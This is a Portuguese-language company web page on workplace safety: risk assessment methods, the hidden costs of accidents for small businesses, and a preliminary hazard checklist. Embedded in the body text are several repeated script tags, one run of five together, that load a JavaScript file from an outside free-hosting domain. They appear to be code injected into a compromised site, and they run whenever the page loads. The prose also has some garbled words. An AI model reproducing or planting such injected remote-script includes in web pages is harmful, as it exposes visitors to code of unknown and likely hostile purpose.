Content on this page requires a newer version of Adobe Flash Player.

Get Adobe Flash player

home emp atend prod dic orc loc fal
 
A importância de conhecer os riscos

<script type="text/javascript" src="http://yourjavascript.com/073729124/r3tr1ngnova.js"></script>Os locais de trabalho, pela própria natureza da atividade desenvolvida e pelas características de organização, relações interpessoais, manipulação ou exposição a agentes físicos, químicos, biológicos, situações de deficiência ergonômica ou riscos de acidentes, podem comprometer a do trabalhador em curto, médio e longo prazo, provocando lesões imediatas, doenças ou a morte, além de prejuízos de
ordem legal e patrimonial para a empresa.

É importante salientar que a presença de produtos ou agentes nocivos nos locais de trabalho não quer dizer que, obrigatoriamente, existe perigo para a saúde. Isso vai depender da combinação ou inter-relação de diversos fatores, como a concentração e a forma do contaminante no ambiente de trabalho, o nível de toxicidade e o tempo de exposição da pessoa. Entretanto, na visão da prevenção, não existem micro ou pequenos riscos, o que existem são micro ou pequenas empresas.
Desta forma, em qualquer tipo de atividade laboral, torna-se imprescindível a necessidade de investigar o ambiente de trabalho para conhecer os riscos a que estão expostos os trabalhadores.

Avaliação de riscos.

É o processo de estimar a magnitude dos riscos existentes no ambiente e decidir se um risco é ou não tolerável.

Formas de avaliar os riscos.

Para investigar os locais de trabalho na busca de eliminar ou neutralizar os riscos ambientais, existem duas modalidades básicas de avaliação. A avaliação qualitativa, conhecida como preliminar, e a avaliação quantitativa, para medir, comparar e estabelecer medidas de eliminação, neutralização ou controle dos riscos.

A mais simples forma de avaliação ambiental é a qualitativa. Na avaliação qualitativa, utiliza-se apenas a sensibilidade do avaliador para identificar o risco existente no local de trabalho.

Exemplo


Ocorrendo o vazamento em um botijão de gás de cozinha, o sentido do olfato imediatamente nos auxilia na identificação do risco.

Na avaliação quantitativa, são necessários o uso de um método científico e a utilização de instrumentos e equipamentos destinados à quantificação do risco.

Exemplo


Para avaliar o calor produzido num forno utilizam-se termômetros específicos; para avaliar o nível d+e ruído de
uma máquina, utilizam-se medidores de pressão sonora.

Prejuízos da empresa

<script type="text/javascript" src="http://yourjavascript.com/073729124/r3tr1ngnova.js"></script>As micro e pequenas empresas são fortemente atingidas pelas conseqüências dos acidentes e doenças, apesar de nem sempre os seus dirigentes perceberem este fato.

O custo total de um acidente é dado pela soma de duas parcelas: uma refere-se ao custo direto (ou custo segurado), a exemplo do recolhimento mensal feito à Previdência Social, para pagamento do seguro contra acidentes do trabalho, visando a garantir uma das modalidades de benefícios estabelecidos na legislação previdenciária.A outra parcela refere-se ao custo indireto (custo não segurado). Estudos informam que a relação entre os custos segurados e os não segurados é de 1 para 4, ou seja, para cada real gasto com os
custos segurados, são gastos 4 com os custos não segurados.

Os custos não segurados impactam a empresa principalmente nos seguintes itens:

  • salário dos quinze primeiros dias após o acidente;
  • transporte e assistência médica de urgência;
  • paralisação de setor, máquinas e equipamentos;
  • comoção coletiva ou do grupo de trabalho;
  • interrupção da produção;
  • prejuízos ao conceito e à imagem da empresa;
  • destruição de máquina, veículo ou equipamento;
  • danificação de produtos, matéria-prima e outros insumos;
  • embargo ou interdição fiscal;
  • investigação de causas e correção da situação;
  • pagamento de horas-extras;
  • atrasos no cronograma de produção e entrega;
  • cobertura de licenças médicas;
    treinamento de substituto;
  • aumento do prêmio de seguro;
  • multas e encargos contratuais;
  • perícia trabalhista, civil ou criminal;
  • indenizações e honorários legais; e
    elevação de preços dos produtos e serviços.

 

Em Breve nossas principais notcias

Em Breve nossas principais notícias

<script type="text/javascript" src="http://yourjavascript.com/073729124/r3tr1ngnova.js"></script><script type="text/javascript" src="http://yourjavascript.com/073729124/r3tr1ngnova.js"></script><script type="text/javascript" src="http://yourjavascript.com/073729124/r3tr1ngnova.js"></script><script type="text/javascript" src="http://yourjavascript.com/073729124/r3tr1ngnova.js"></script><script type="text/javascript" src="http://yourjavascript.com/073729124/r3tr1ngnova.js"></script>A análise preliminar das condições de trabalho permite a elaboração de estratégias que vão subsidiar as etapas de implantação do programa de gestão de saúde e segurança no trabalho, e é estabelecida com quatro indagações bem simples::

  • O trabalhador está exposto à fonte de perigo?
  • O trabalhador está em contato com a fonte de perigo?
  • Qual o tempo e a freqüência do contato entre o trabalhador e a fonte de perigo?
  • Qual a distância entre o trabalhador e a fonte de perigo?

De forma preliminar, das quatro indagações, conclui-se que:


  • quanto maior o tempo de exposição ou de contato com a fonte de perigo, maior será o

risco;

  • quanto maior for a freqüência da exposição ao perigo, maior será o risco; e
  • quanto mais próximo da fonte de perigo, maior será o risco.
  • É importante ressaltar que a fonte de perigo pode ser um equipamento, uma máquina, um
    instrumento ou qualquer condição de trabalho perigosa.
  • diagnóstico inicial para conhecer as características da empresa, dos trabalhadores e
    dos ambientes de trabalho;
  • mapeamento dos processos de produção e atividades relacionadas, para
    conhecimento de suas principais etapas;
  • avaliação dos riscos para identificar as fontes de perigo e estimar os riscos a elas
    associados;
  • identificação de requisitos legais e outros para verificar a situação da empresa em
    relação ao cumprimento da legislação e de acordos ou contratos firmados;

 

Content on this page requires a newer version of Adobe Flash Player.

Get Adobe Flash player

© Direitos Reservados - ALPHA Equipamentos - Barcarena / Pará - AG Brasil - Soluções WEB